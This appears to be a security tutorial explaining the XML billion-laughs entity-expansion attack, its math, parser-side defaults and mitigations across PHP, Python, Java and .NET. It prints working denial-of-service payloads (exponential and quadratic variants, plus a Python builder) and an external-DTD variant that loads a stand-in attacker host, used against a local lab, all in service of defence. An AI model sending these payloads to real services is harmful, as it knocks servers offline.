Billion Laughs Attack: XML Entity Bomb in 2026

The billion laughs attack is the original XML denial-of-service trick: a payload that fits inside a single HTTP request but, if the parser expands it naively, explodes into roughly a billion characters of memory before the parse completes. It is the textbook parser-resource-exhaustion bug, and in 2018 every "XML security" talk closed with the same screenshot of a lol6 payload melting a server. In 2026 that screenshot is a museum piece for one specific reason: libxml has shipped a default entity-expansion ceiling for over a decade, and a modern PHP, Python, or .NET parser refuses the payload before it costs anything. The attack is still worth knowing because the family is bigger than XML, and because the protection is a single flag away from being switched off.

This article is a variant deep-dive under the XML External Entity guide. I cover the exact payload, the math behind the exponential blow-up, why this is a parser-side rather than a network-side DoS, what libxml's default ceiling actually does, a working walk-through against the xxe-basic lab, the variants the same ceiling still catches, the analogous bombs in YAML / JSON / protobuf, and the fix when an application genuinely needs entity expansion turned up.

TL;DR

Billion laughs is an XML payload that declares a small chain of nested entities, each one ten times longer than the previous. The on-wire document is under a kilobyte. In its classic ten-entity form, a parser that expands every entity reference end to end produces roughly one billion copies of the base string (about 3 GB of substituted text) inside the parse tree, exhausting memory in seconds. The attack assumes the parser will do unbounded entity expansion. Modern libxml does not: since the 2.9.x line it enforces an entity-expansion ceiling by default, refuses any document that crosses it, and surfaces a parse error instead. PHP's DOMDocument, Python's lxml, and .NET's XmlReader all inherit safe defaults. The realistic 2026 attack surface is legacy code that opts out (LIBXML_PARSEHUGE in PHP, XML_PARSE_HUGE in C), older parsers, custom XML stacks, and the non-XML analogues in YAML, JSON deep-nesting, protobuf recursion, and zip bombs.

The exact payload

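The payload that gave the attack its name is an exponential entity chain that dates back to the original 2003 disclosure. The version below stops at lol6 to keep the listing short; the Wikipedia article reproduces the full ten-entity chain: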

```
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<root>&lol6;</root>
```

The fence has no language tag on purpose: MDX's parser is happy with raw XML inside a plain code block and unhappy with the {n,m}-shaped tokens that show up later in this article, so the convention across the techearl XXE pages is to leave XML fenced without a language hint.

Reading line by line:

lol is the base case. One entity whose value is the literal three-character string lol.
lol2 is ten references to lol. Fully expanded, it is 30 characters.
lol3 is ten references to lol2. Fully expanded, it is 300 characters (10 times the previous level).
Each subsequent level (lol4, lol5, lol6) is again ten references to the previous level: 3,000, 30,000, and 300,000 characters fully expanded.
The document body contains a single reference to lol6.

The DTD body itself is small. The whole payload fits in a few hundred bytes on the wire. The work all happens at parse time, when the parser walks the entity chain to expand &lol6; into the substituted text that the parse tree is supposed to contain.
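To make the "small on the wire" claim concrete, here is a minimal Python sketch that rebuilds the chain above and measures it. The function name build_payload and its parameters are illustrative, not part of any library; the script only constructs the string and never parses it.

```python
def build_payload(entities: int = 6, fanout: int = 10) -> str:
    """Build the exponential chain lol, lol2, ..., lol<entities> as XML text."""
    if entities < 2 or fanout < 1:
        raise ValueError("need at least two entities and a positive fanout")
    names = ["lol"] + [f"lol{i}" for i in range(2, entities + 1)]
    lines = [
        '<?xml version="1.0"?>',
        "<!DOCTYPE lolz [",
        '  <!ENTITY lol "lol">',  # base case: a literal three-character string
    ]
    # Every later entity is `fanout` references to the one before it.
    for previous, name in zip(names, names[1:]):
        lines.append(f'  <!ENTITY {name} "{f"&{previous};" * fanout}">')
    lines += ["]>", f"<root>&{names[-1]};</root>"]
    return "\n".join(lines) + "\n"


payload = build_payload()
print(f"{len(payload.encode('utf-8'))} bytes on the wire")
```

Adding one more entity to the chain adds one more line of roughly eighty bytes to the document while multiplying the expanded size by ten, which is the whole asymmetry.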

The math

Ten-way fanout per level means each entity is ten times the size of the one before it.

In the chain shown above, lol2 is 10 copies of lol, lol3 is 100, and lol6 is 10^5 copies: 300,000 characters, which is enough to show the mechanism but not enough to hurt. The classic payload carries the same pattern through ten entities, so the top-level reference expands to 10^9 copies of lol, roughly 3 billion characters, or about 3 GB if the parser materialises the substitution. The "billion" in the name is that copy count rather than the final byte count, which is why different write-ups quote slightly different numbers. The detail that matters in practice is the ratio: under a kilobyte of input forces gigabytes of allocated memory.
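The arithmetic is a one-line recurrence: each entity's expanded length is the fanout times the previous entity's length. A small sketch, with expanded_lengths as a hypothetical helper name, computes the sizes without expanding anything:

```python
def expanded_lengths(entities: int, fanout: int = 10, base: str = "lol") -> list[int]:
    """Fully expanded length, in characters, of each entity in the chain."""
    if entities < 1:
        raise ValueError("need at least one entity")
    lengths = [len(base)]  # the base entity is the literal string itself
    for _ in range(entities - 1):
        lengths.append(lengths[-1] * fanout)  # ten references to the previous level
    return lengths


for index, length in enumerate(expanded_lengths(10), start=1):
    print(f"entity {index:2d}: {length:>13,} characters")
```

With six entities the last value is 300,000 characters; with ten entities it is 3,000,000,000, which is where the attack gets its name.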

A naive parser does this expansion eagerly, materialising each lol_n+1 as the concatenation of ten lol_n substitutions before storing it in the entity table. Memory pressure is what kills the process. Older XML parsers crashed outright; saturated servers OOM-killed the worker; in a few documented cases an entire app server dropped because the worker pool was wedged inside the parse. None of this requires the attacker to be authenticated or to send anything but a single small request.

Parser-side, not network-side

This is the part that makes entity-expansion bombs a different shape of problem than ordinary network DoS.

A volumetric DoS needs an asymmetric upstream link, a botnet, or an amplification vector. A SYN flood needs enough source addresses to outpace the connection table. A slowloris needs to hold open more sockets than the server has worker slots. All of them are visible at the network layer, all of them are within the remit of a CDN or a layer-7 WAF.

Billion laughs is a single, small, well-formed HTTP POST. A few KB on the wire. The CDN forwards it without complaint. The WAF, unless it has been taught to look at DOCTYPE bodies and count entity references, sees a normal XML body. The cost is entirely on the parser side. A 2 KB request consumes gigabytes of server memory. The amplification ratio is north of a million to one, and it lives one layer below the network the perimeter is watching.

This is the same shape of problem as a SQL injection that triggers a Cartesian join (small query, huge plan) or a regex catastrophic backtracking ReDoS (small input, exponential matcher work). The work happens inside an interpreter the perimeter cannot see into.
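As a rough illustration of what "teaching the perimeter to look at DOCTYPE bodies" could mean, the sketch below counts entity declarations and references in a raw request body. It is a heuristic under stated assumptions: the function names and thresholds are hypothetical, it only inspects ASCII-compatible encodings, and it is no substitute for a parser-side limit.

```python
import re

ENTITY_DECL = re.compile(rb"<!ENTITY\s")
ENTITY_REF = re.compile(rb"&([A-Za-z_][\w.\-]*);")
PREDEFINED = {b"lt", b"gt", b"amp", b"apos", b"quot"}  # XML's built-in entities


def doctype_stats(body: bytes) -> dict:
    """Count DTD entity declarations and non-predefined entity references."""
    references = [name for name in ENTITY_REF.findall(body) if name not in PREDEFINED]
    return {
        "has_doctype": b"<!DOCTYPE" in body,
        "entity_declarations": len(ENTITY_DECL.findall(body)),
        "entity_references": len(references),
    }


def looks_like_entity_bomb(body: bytes, max_declarations: int = 0,
                           max_references: int = 100) -> bool:
    """Flag bodies that exceed the (hypothetical) thresholds.

    A UTF-16 body or other encoding tricks would evade this byte-level scan.
    """
    stats = doctype_stats(body)
    return (stats["entity_declarations"] > max_declarations
            or stats["entity_references"] > max_references)
```

The default of zero allowed declarations reflects an assumption that the endpoint has no legitimate use for inline DTDs; an endpoint that does would need a different policy.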

Why modern libxml defaults block it

libxml2, the C XML library that backs PHP's DOMDocument, Python's lxml, Perl's XML::LibXML, Ruby's Nokogiri, and a long tail of language bindings, ships with a hard entity-expansion ceiling on by default. The exact constant and accounting have shifted across the 2.9.x series and later, but the shape is constant: the parser tracks total entity-substitution size across the document, and if the cumulative expansion would cross the ceiling, it aborts the parse with a diagnostic such as "Detected an entity reference loop" or, depending on the build, "Maximum entity amplification factor exceeded".
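The idea of a cumulative ceiling can be sketched in a few lines of Python. This is a toy model to show the shape of the defence, not libxml's actual algorithm or constants: the expand function, the exception name, and the limit values are all assumptions made for illustration.

```python
import re

REFERENCE = re.compile(r"&([A-Za-z_][\w.\-]*);")


class ExpansionLimitExceeded(Exception):
    """Raised when cumulative substitution crosses the ceiling."""


def expand(text: str, entities: dict[str, str], limit: int, max_depth: int = 40) -> str:
    spent = 0  # characters produced by substitution so far, document-wide

    def substitute(value: str, depth: int) -> str:
        nonlocal spent
        if depth > max_depth:
            raise ExpansionLimitExceeded("entity nesting too deep (possible loop)")
        pieces, position = [], 0
        for match in REFERENCE.finditer(value):
            pieces.append(value[position:match.start()])
            replacement = substitute(entities[match.group(1)], depth + 1)
            # Charge every substitution to one shared budget. Nested levels are
            # charged again at each level, which errs on the conservative side.
            spent += len(replacement)
            if spent > limit:
                raise ExpansionLimitExceeded(f"expansion exceeded {limit} characters")
            pieces.append(replacement)
            position = match.end()
        pieces.append(value[position:])
        return "".join(pieces)

    return substitute(text, 0)
```

Because the budget is checked after each substitution, the expander aborts once a bounded amount of text has been produced, so memory use stays near the limit however large the fully expanded document would have been.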

The ceiling has been the default for the entire useful life of PHP 8.x. You do not need to do anything to your code to get it. A new DOMDocument() plus $dom->loadXML($untrusted) is safe against billion laughs as written, today, with no additional flags.

The flag that turns the protection off is LIBXML_PARSEHUGE (in PHP; XML_PARSE_HUGE at the C layer). Passing it to loadXML disables the entity-expansion ceiling along with several other size limits the parser enforces. There is exactly one good reason to reach for it: you have a legitimate, trusted, very large XML document that hits the default ceiling on legitimate content. If that is not your situation, do not pass the flag. If you cannot remember why your codebase passes the flag, remove it and run your tests.
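If you are not sure whether your codebase passes the flag, a short audit script can list the places that do. The sketch below is an assumption-laden starting point: the helper names and the file-suffix list are illustrative, and alongside the PHP and C constants it also looks for huge_tree=True, the lxml XMLParser option that lifts the same libxml limits.

```python
import re
from pathlib import Path

HUGE_FLAG = re.compile(
    r"\b(?:LIBXML_PARSEHUGE|XML_PARSE_HUGE)\b|huge_tree\s*=\s*True\b"
)


def scan_text(text: str) -> list[tuple[int, str]]:
    """Return (line number, stripped line) for every line that opts out."""
    return [
        (number, line.strip())
        for number, line in enumerate(text.splitlines(), start=1)
        if HUGE_FLAG.search(line)
    ]


def find_huge_flags(root: str, suffixes=(".php", ".c", ".h", ".py")) -> list[tuple[str, int, str]]:
    """Walk a source tree and collect every opt-out with its file and line."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits.extend((str(path), number, line) for number, line in scan_text(text))
    return hits
```

Each hit is a place to ask whether the input on that code path is genuinely trusted.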

This is the same shape of advice as the rest of the XXE story: the unsafe configuration is opt-in, the safe configuration is the default, and the production bugs are concentrated in code where someone copied a Stack Overflow snippet that opted in without explaining why.

Lab walkthrough: the `xxe-basic` import endpoint

The xxe-basic lab in the techearl-labs repo sets the unsafe XXE flags (LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA) so it can demonstrate the file-read and OOB variants from the parent article. It deliberately does not pass LIBXML_PARSEHUGE, which means the default entity-expansion ceiling is intact. That is the right shape for this scenario: the lab is unsafe for entity resolution and safe for entity expansion, and you can prove both in the same container.

Bring up the lab:

```bash
docker compose up xxe-basic
```

Save the lol6 payload from earlier in this article to payload.xml, then POST it to the import endpoint:

```bash
curl -s -X POST --data-binary @payload.xml \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php
```
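If you prefer to script the request, a standard-library Python equivalent of the curl command might look like the sketch below. The URL and content type are taken from the command above; the function names are illustrative.

```python
import urllib.error
import urllib.request

LAB_URL = "http://localhost:8086/import.php"  # same endpoint as the curl command


def build_import_request(payload: bytes, url: str = LAB_URL) -> urllib.request.Request:
    """Build the POST without sending it."""
    return urllib.request.Request(
        url,
        data=payload,
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


def post_payload(path: str = "payload.xml", timeout: float = 10.0) -> tuple[int, str]:
    """Send the saved payload and return (status code, response body)."""
    with open(path, "rb") as handle:
        request = build_import_request(handle.read())
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status, response.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as error:
        # urllib raises on 4xx/5xx; the error object still carries the body.
        return error.code, error.read().decode("utf-8", "replace")
```

Calling post_payload() with the lab running returns the status code and the error page body, which is convenient when you want to repeat the request in a loop while watching container resources.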

The response is an XML parse error page from the lab's error handler, carrying a libxml diagnostic about the entity-expansion limit. The interesting part is what does not happen. Watch container resources in another terminal:

```bash
docker stats xxe-basic
```

CPU stays at a fraction of a core. Memory stays at whatever the PHP-FPM workers were already using. The parse aborts long before the substitution would materialise. The endpoint serves the next request normally; the worker pool is not wedged; nothing in docker compose logs xxe-basic says anything more dramatic than "request returned 400".

This is the right answer for a deliberately vulnerable lab: the attack is documented, the default mitigation is documented, and the mitigation visibly fires. If you wanted to see the attack succeed, you would have to fork the lab to pass LIBXML_PARSEHUGE to loadXML. That is not a footgun you walk into by accident.

Variants the same ceiling catches

The exponential six-level chain is the famous shape, but it is not the only one the entity-expansion ceiling has to defend against. Two adjacent variants are worth knowing.

Quadratic blowup

Quadratic blowup skips the nested-chain trick and just declares a single, long entity, then references it many times in the document body:

```
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY a "aaaaaaaaaaaaaaaaaaaaaaaa... (50 KB of 'a') ...">
]>
<root>
  <x>&a;</x>
  <x>&a;</x>
  <x>&a;</x>
  ... (10000 copies) ...
</root>
```

50 KB times 10000 references is 500 MB of expansion. The amplification ratio is worse than a simple file but nowhere near the billion-laughs ratio; on the other hand, the structure is harder to spot in a "no DTD" WAF rule because there is only one entity declaration and it looks unremarkable. The same libxml ceiling catches it: the parser tracks cumulative expansion, not nesting depth, and aborts at the same threshold. LIBXML_PARSEHUGE re-enables the bug.
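The numbers are easy to check with a short sketch. It builds the document shape shown above (treating 50 KB as 50,000 characters, which is an assumption) and compares the on-wire size with the expanded size; nothing is parsed, and the function names are illustrative.

```python
def build_quadratic(entity_length: int, references: int) -> str:
    """One long entity, referenced many times in the body."""
    entity = "a" * entity_length
    body = "\n".join("  <x>&a;</x>" for _ in range(references))
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE lolz [\n"
        f'  <!ENTITY a "{entity}">\n'
        "]>\n"
        f"<root>\n{body}\n</root>\n"
    )


def amplification(entity_length: int = 50_000, references: int = 10_000) -> tuple[int, int, float]:
    """Return (bytes on the wire, characters after expansion, ratio)."""
    wire = len(build_quadratic(entity_length, references).encode("utf-8"))
    expanded = entity_length * references  # each reference expands to the full entity
    return wire, expanded, expanded / wire


wire, expanded, ratio = amplification()
print(f"{wire:,} bytes in, {expanded:,} characters out, about {ratio:,.0f}x")
```

The ratio grows with both knobs, which is what makes the variant quadratic rather than exponential: doubling the entity length and the reference count together doubles the input but quadruples the output.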

External entity expansion

The third variant chains the bomb across an external DTD: a parameter entity in the inline DOCTYPE points at an attacker-controlled URL, the remote DTD declares the exponential chain, the inline document then references the top-level entity.

```
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY % remote SYSTEM "http://attacker.example/bomb.dtd">
  %remote;
]>
<root>&lol6;</root>
```

Two defaults catch this. First, libxml since 2.9.0 has external-entity loading off by default, so the remote DTD does not load at all unless the application explicitly opted in (the same LIBXML_NOENT plus LIBXML_DTDLOAD combination that opens up classical XXE). Second, even if external loading is on, the entity-expansion ceiling still applies to the entities the remote DTD declares: the ceiling counts every substitution, regardless of where the declaration came from. You need both defaults turned off to land this variant, which is why it is essentially absent from production CVE history past the early 2010s.

The fix when you have to keep entity expansion enabled

Most applications do not need to. The rare ones that genuinely process trusted, structured XML with large legitimate entity expansion (think: a fully-validated DocBook publishing pipeline) need to raise the ceiling without removing it. The shape of the fix is the same across stacks:

PHP. Do not pass LIBXML_PARSEHUGE to loadXML. If you absolutely must (for a legitimate large document), pass it only on the trusted import path and keep it off for any endpoint that accepts attacker-controlled XML. There is no per-call "expansion limit" setting in PHP's libxml binding; the flag is binary.

Python. Use defusedxml for any untrusted input. It refuses entity declarations entirely, which closes the class off rather than tuning a limit. For lxml specifically, instantiate the parser with resolve_entities=False to disable expansion of declared entities altogether:

```python
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)
tree = etree.fromstring(untrusted_xml, parser)
```
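The "refuse entity declarations entirely" approach can also be sketched with nothing but the standard library, by hooking expat's entity-declaration callback and raising from it. This is an illustration of the technique under stated assumptions, not defusedxml's implementation; the exception and function names are hypothetical.

```python
import xml.parsers.expat


class EntityDeclarationForbidden(ValueError):
    """Raised as soon as the document declares any entity."""


def check_no_entities(data: bytes) -> bool:
    """Parse for well-formedness and refuse any <!ENTITY ...> declaration."""
    parser = xml.parsers.expat.ParserCreate()

    def forbid(name, is_parameter_entity, value, base, system_id, public_id, notation_name):
        # Fires on the declaration itself, before any reference is expanded.
        raise EntityDeclarationForbidden(f"entity declaration {name!r} refused")

    parser.EntityDeclHandler = forbid
    parser.Parse(data, True)  # exceptions raised in handlers propagate to the caller
    return True
```

Rejecting at declaration time means the decision is made on the first entity in the DTD, so the cost of refusing a bomb is the cost of reading a few bytes of it.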

Java. Enable XMLConstants.FEATURE_SECURE_PROCESSING on the factory, which (among other things) caps entity expansion. The exact ceiling is controlled by the jdk.xml.entityExpansionLimit system property, which defaulted to 64000 expansions for many JDK releases; confirm the value for the JDK you actually run. Raise it deliberately on the trusted code path if you have to; never disable it.

.NET. XmlReaderSettings.MaxCharactersFromEntities caps the total characters produced by entity expansion. The default is conservative (10 million on recent .NET versions). Set it explicitly on the settings object and pair it with DtdProcessing = DtdProcessing.Prohibit for any endpoint parsing arbitrary input.

The full per-parser configuration story for the rest of the XXE class is in the XML External Entity guide under "XXE in other parsers".

Analogous attacks in non-XML parsers

The entity-expansion family is broader than XML. The general shape is: a small input that triggers exponential, recursive, or repeated work inside a parser that did not defend its substitution layer. Every serialization format that supports references, aliases, or nested includes has had a member of the family.

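YAML. The "YAML billion laughs" uses anchors and aliases to reference the same node exponentially, similar in shape to the XML chain. PyYAML has carried vulnerabilities around its unsafe loader (verify the CVE ID against the upstream advisory before quoting; the PyYAML maintainers have hardened the safe-loader path across multiple releases). The baseline fix is the safe loader (yaml.safe_load), which refuses arbitrary tags. It still resolves aliases, though: in PyYAML an alias becomes a reference to the same object, so the blow-up is deferred until something walks or re-serialises the structure. For untrusted YAML, also cap document size and, where the library supports it, alias count.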

JSON. JSON has no entity layer, but deeply-nested JSON triggers a different parser pathology: recursive-descent parsers can blow the call stack on a few hundred KB of [[[[...]]]]. Some streaming JSON parsers handle this; others crash. The fix is depth-limiting the parser, which most modern JSON libraries do by default.
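For a parser that does not expose a depth setting, one option is to measure nesting depth with a flat scan before handing the text to the recursive parser. The sketch below assumes a limit of 64, which is an arbitrary illustrative value, and the function names are hypothetical.

```python
import json


def max_nesting_depth(text: str) -> int:
    """Deepest [ or { nesting in the text, ignoring brackets inside strings."""
    depth = deepest = 0
    in_string = escaped = False
    for char in text:
        if in_string:
            if escaped:
                escaped = False
            elif char == "\\":
                escaped = True
            elif char == '"':
                in_string = False
        elif char == '"':
            in_string = True
        elif char in "[{":
            depth += 1
            deepest = max(deepest, depth)
        elif char in "]}":
            depth -= 1
    return deepest


def loads_with_depth_limit(text: str, max_depth: int = 64):
    """Reject over-deep documents before the recursive parser sees them."""
    if max_nesting_depth(text) > max_depth:
        raise ValueError(f"JSON nesting deeper than {max_depth}")
    return json.loads(text)
```

The scan is iterative, so it uses constant stack space regardless of how deep the input nests.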

Protocol Buffers. Protobuf message types can be recursive (a message that contains itself), and a hand-crafted wire payload can request a recursion depth that the decoder cannot handle. The protobuf runtimes ship a recursion limit (CodedInputStream::SetRecursionLimit in C++, with equivalents in the other runtimes) precisely for this reason.

Zip bombs. Same family, different parser layer. A small zip file that decompresses to many gigabytes, used historically against virus scanners and email gateways that expanded archives in memory. The fix is decompression-size and decompression-ratio limits on the unzip path. The 42 KB classic zip bomb is the spiritual sibling of the few-hundred-byte XML billion-laughs payload.
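A minimal version of the size-and-ratio check, using Python's zipfile module, might look like this. The limits are illustrative assumptions, and the check trusts the sizes declared in the archive's directory, so a real extraction path should also count bytes while streaming.

```python
import io
import zipfile


class ZipLimitExceeded(ValueError):
    """Raised when an archive declares more output than the policy allows."""


def check_zip_limits(data: bytes, max_total: int = 100 * 1024 * 1024,
                     max_ratio: float = 100.0) -> int:
    """Return the declared uncompressed total, or raise if a limit is crossed."""
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            total += info.file_size  # declared uncompressed size of this member
            if total > max_total:
                raise ZipLimitExceeded(f"archive expands past {max_total} bytes")
            if info.compress_size and info.file_size / info.compress_size > max_ratio:
                raise ZipLimitExceeded(f"{info.filename} exceeds ratio {max_ratio}")
    return total
```

The check reads only the archive metadata, so it costs almost nothing and runs before a single byte is decompressed.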

The pattern across all of these is the same: any layer that takes a short input and produces a longer output, recursively, needs an explicit cap on the output side. Parser authors learned this lesson over the 2010s; the defaults are now in the right place across most major libraries. The remaining risk lives in custom parsers, in third-party code that disabled the defaults, and in formats whose libraries are still maturing.

Real-world incidents

Three illustrative entries from the public CVE history, with the standard caveat that you should pull exact affected versions from the vendor advisory or NVD before quoting them:

CVE-2003-1564 is the libxml2 entry for the original billion-laughs technique: the parser did not bound recursive entity expansion. The interesting half is the breadth: other XML stacks of the era were vulnerable to the same payload, because none of them had thought to cap entity expansion until somebody demonstrated why they should.
CVE-2013-2099 in Python's ssl.match_hostname is a regex-DoS rather than an XML one, but it is in the same family: a small malicious input forcing exponential parser work. I mention it to underline the family resemblance; the standard-library fix and the libxml fix landed in the same era and were driven by the same architectural lesson.
PyYAML's billion-laughs class has been raised against the project across its history, alongside the better-known unsafe-loader issues that make safe_load the recommended entry point. Note that safe_load restricts which tags are constructed and does not by itself cap alias expansion. Search the PyYAML changelog and the linked CVE entries when you need the specific identifiers; the headline behaviour is consistent across the disclosures.

The pattern across the history is that entity-expansion bombs are rarely the headline finding in a modern penetration test. They show up where someone has explicitly disabled a default, where a custom parser has reimplemented the substitution layer without the cap, or where a non-XML format's library is still catching up to the lessons libxml learned in 2003.

Where to go next

The parent guide is the XML External Entity practitioner walkthrough; it covers the entity-resolution side of the same parser surface, the in-band and out-of-band file-read variants, and the parameter-entity recursive chain. Sister spokes under the same hub: blind XXE and out-of-band exfil for the OOB primitive in detail, and XInclude attacks for the entity-free path that audits routinely miss. The hub is the web application security vulnerabilities taxonomy.

Can I still hit billion laughs in 2026?

Only if the application explicitly opts out of the default protection (LIBXML_PARSEHUGE in PHP, XML_PARSE_HUGE in C, FEATURE_SECURE_PROCESSING disabled in Java, MaxCharactersFromEntities raised in .NET) or runs an ancient parser that predates the ceiling. A vanilla PHP 8.x DOMDocument, Python lxml, .NET XmlReader, or modern Java JAXP factory will refuse the payload without any application-side configuration.

Is there a defence against the quadratic blowup variant?

The same one. libxml's entity-expansion ceiling counts total substitution size, not nesting depth, so a single long entity referenced many times hits the cap as readily as a nested chain. The quadratic variant has a lower amplification ratio than the exponential one, but it is still firmly inside the ceiling that libxml enforces by default.

Are zip bombs the same family of attack?

Yes, in the architectural sense. Both involve a small input producing vastly larger output inside a parser or decoder, with the cost paid entirely on the server side. The mitigation pattern is the same too: cap the output side explicitly (entity-expansion ceiling for XML, decompression-size and decompression-ratio limits for zip). Different parser layer, same lesson.

What about JSON and YAML?

JSON has no entity layer, so it cannot carry a billion-laughs payload as written, but a deeply-nested JSON document can still blow the call stack of a recursive-descent parser; the fix is a depth limit, which most major JSON libraries now apply by default. YAML has the anchor-and-alias analogue. yaml.safe_load is the right default because it refuses arbitrary tags, but it still resolves aliases, so untrusted YAML also needs a document-size limit and, where the library offers one, an alias-count limit.

Does the entity-expansion ceiling block legitimate large XML documents?

Occasionally, yes. A multi-megabyte DocBook document with a heavy entity-driven boilerplate section can hit the default ceiling on legitimate content. The right response is to scope the change to the trusted import path (raising the numeric limit in stacks that expose one, such as Java and .NET, or passing the flag on that one call in PHP), not to disable the ceiling globally. If the only way to make your code parse is to flip LIBXML_PARSEHUGE on for every request, you have a bigger architecture problem than entity expansion.

Ishan Karunaratne